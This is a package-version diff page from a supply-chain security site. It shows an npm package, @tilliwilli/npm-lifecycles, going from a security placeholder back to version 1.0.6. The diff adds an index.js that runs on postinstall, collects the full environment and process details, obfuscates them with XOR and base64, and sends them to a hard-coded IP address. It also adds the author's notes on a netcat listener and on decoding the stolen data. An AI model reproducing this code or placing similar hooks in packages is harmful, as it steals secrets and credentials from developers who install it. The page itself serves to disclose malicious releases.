npm - @tilliwilli/npm-lifecycles - Versions diffs - 0.0.1-security → 1.0.6 - Mend

@tilliwilli/npm-lifecycles 0.0.1-security → 1.0.6

Potentially problematic release.

This version of @tilliwilli/npm-lifecycles might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,33 @@
+var util = require("util");
+var http = require("http");
+var package = require("./package.json");
+var log = {
+    package: package.version,
+    time: (new Date()).toISOString(),
+    event: process.env.npm_lifecycle_event,
+    version: process.version,
+    arch: process.arch,
+    platform: process.platform,
+    features: process.features,
+    env: process.env,
+    title: process.title,
+    argv: process.argv,
+    execArgv: process.execArgv,
+    pid: process.pid,
+    ppid: process.ppid,
+    execPath: process.execPath,
+    debugPort: process.debugPort,
+    argv0: process.argv0,
+    _preload_modules: process._preload_modules,
+    mainModule: process.mainModule,
+};
+var output = util.inspect(log);
+http
+    .get({
+        hostname: "51.250.107.250",
+        headers: { Authorization: `Bearer ` + Buffer.from(output).map(x => x ^ 7).toString("base64") }
+    })
+    .end();

package/package.json CHANGED Viewed

@@ -1,6 +1,8 @@
 {
   "name": "@tilliwilli/npm-lifecycles",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "1.0.6",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/readme.md ADDED Viewed

@@ -0,0 +1,84 @@
+# list of events occur when publishing
+- prepublishOnly
+- prepack
+- prepare
+- postpack
+- publish
+- postpublish
+# list of events occur when installing from npm registry
+- preinstall
+- install
+- postinstall
+# list of events occur when installing from file:// protocol (file:///htdocs/test)
+- preinstall
+- prepare
+- install
+- postinstall
+# list of events occur when installing from http:// protocol (http://localhost:8000/test.tar.gz)
+- preinstall
+- install
+- postinstall
+# what web server receives from `npm i http://localhost:8000/test.tar.gz`
+```bash
+┌──(tilli㉿pasakoh)-[/mnt/c/Users/tilli/htdocs/visiology-public-utilities-hack]
+└─$ nc -lvnp 8000
+listening on [any] 8000 ...
+connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48492
+GET /test.tar.gz HTTP/1.1
+npm-command: install
+pacote-pkg-id: remote:xxx@http://localhost:8000/test.tar.gz
+pacote-req-type: tarball
+pacote-version: 12.0.3
+user-agent: npm/8.5.0 node/v16.14.2 win32 x64 workspaces/false
+if-modified-since: Sun, 10 Apr 2022 12:48:38 GMT
+connection: keep-alive
+Accept: */*
+Accept-Encoding: gzip,deflate
+Host: localhost:8000
+```
+# listening server
+```bash
+while true; do sudo nc -N -lvnp 80 < response.json >> output; done
+```
+# response.json
+```bash
+HTTP/1.1 200 OK
+Connection: close
+{"result":"ok"}
+```
+# extract request payload
+```bash
+grep Auth output | awk '{print $3}' | base64 -d | less
+```
+# investigate more
+- place exe in node_modules/.hooks/{eventname} https://docs.npmjs.com/cli/v6/using-npm/scripts#hook-scripts
+# links
+https://docs.npmjs.com/cli/v8/using-npm/scripts#life-cycle-scripts
+https://docs.npmjs.com/cli/v8/configuring-npm/package-json#scripts

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40tilliwilli%2Fnpm-lifecycles for more information.